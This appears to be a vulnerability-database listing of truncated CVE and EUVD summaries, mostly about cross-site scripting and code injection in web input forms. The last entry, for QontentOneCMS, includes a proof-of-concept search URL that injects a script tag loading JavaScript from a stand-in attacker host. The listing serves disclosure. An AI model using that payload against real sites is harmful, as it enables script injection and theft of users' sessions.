CVE-2026-27474 SPIP < 4.4.9 Cross-Site Scripting in Private Area (Incomplete Fix)

SPIP before 4.4.9 allows Cross-Site Scripting XSS in the private area, complementing an incomplete fix from SPIP 4.4.8. The echappeantixss function was not systematically applied to input, form, button, and anchor a HTML tags, allowing an attacker to inject malicious scripts through these element...

CVE-2025-71249

Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority...

CVE-2025-71249

This CVE entry is rejected/not used and does not represent an active vulnerability entry.

EUVD-2007-1774

Malware in sbrugna...

EUVD-2006-2515

Malware in sbrugna...

EUVD-2020-28356

Malware in sbrugna...

EUVD-2006-2638

Malware in sbrugna...

EUVD-2013-6004

Malware in sbrugna...

EUVD-2021-29503

Malicious code in bioql PyPI...

CVE-2017-17888

cgi-bin/write.cgi in Anti-Web through 3.8.7, as used on NetBiter / HMS, Ouman EH-net, Alliance System WS100 -- AWU 500, Sauter ERW100F001, Carlo Gavazzi SIU-DLG, AEDILIS SMART-1, SYXTHSENSE WebBiter, ABB SREA, and ASCON DY WebServer devices, allows remote authenticated users to execute arbitrary ...

CVE-2021-42534

The affected product’s web application does not properly neutralize the input during webpage generation, which could allow an attacker to inject code in the input forms...

Code injection

The affected product’s web application does not properly neutralize the input during webpage generation, which could allow an attacker to inject code in the input forms...

Cross site scripting

The Calculated Fields Form plugin through 1.0.353 for WordPress suffers from multiple Stored XSS vulnerabilities present in the input forms. These can be exploited by an authenticated user...

CVE-2020-7228

The Calculated Fields Form plugin through 1.0.353 for WordPress suffers from multiple Stored XSS vulnerabilities present in the input forms. These can be exploited by an authenticated user...

CVE-2020-7228

CVE-2020-7228 affects WordPress Calculated Fields Form plugin (versions

Symfony Configuration Cheat Sheet

The Symfony framework provides web developers with a great foundation for their PHP applications. Several components can be used for many recurring tasks that are required in every application, such as handling input forms or accessing a database. In addition to functional tasks, security-relevan...

Cross site scripting

Cross-site scripting XSS vulnerability in the DHT shell owdhtshell in Overlay Weaver 0.5.9 to 0.5.11, when invoked with the -x option, allows remote attackers to inject arbitrary web script or HTML via fields in certain input forms...

CVE-2007-1780

Cross-site scripting XSS vulnerability in the DHT shell owdhtshell in Overlay Weaver 0.5.9 to 0.5.11, when invoked with the -x option, allows remote attackers to inject arbitrary web script or HTML via fields in certain input forms...

MobeSpace v2.0 - XSS

MobeSpace v2.0 Homepage: http://mobescripts.com/ Effected files: index.php The input forms of: - Profile - Comments - Uploading a file to your locker - Posting in your blog - Creating a caption for your pic - Sending PM's The input boxes of the above do not sanatize user input before generating i...

QontentOneCMS v1.0

QontentOneCMS v1.0 homepage: http://www.qontentone.com/ Effected files: search.php input forms XSS Proof of concept: http://www.example.com/search.php?searchphrase="SCRIPT SRC=http://www.evilsite.com/xss.js/SCRIPT"&search=Search...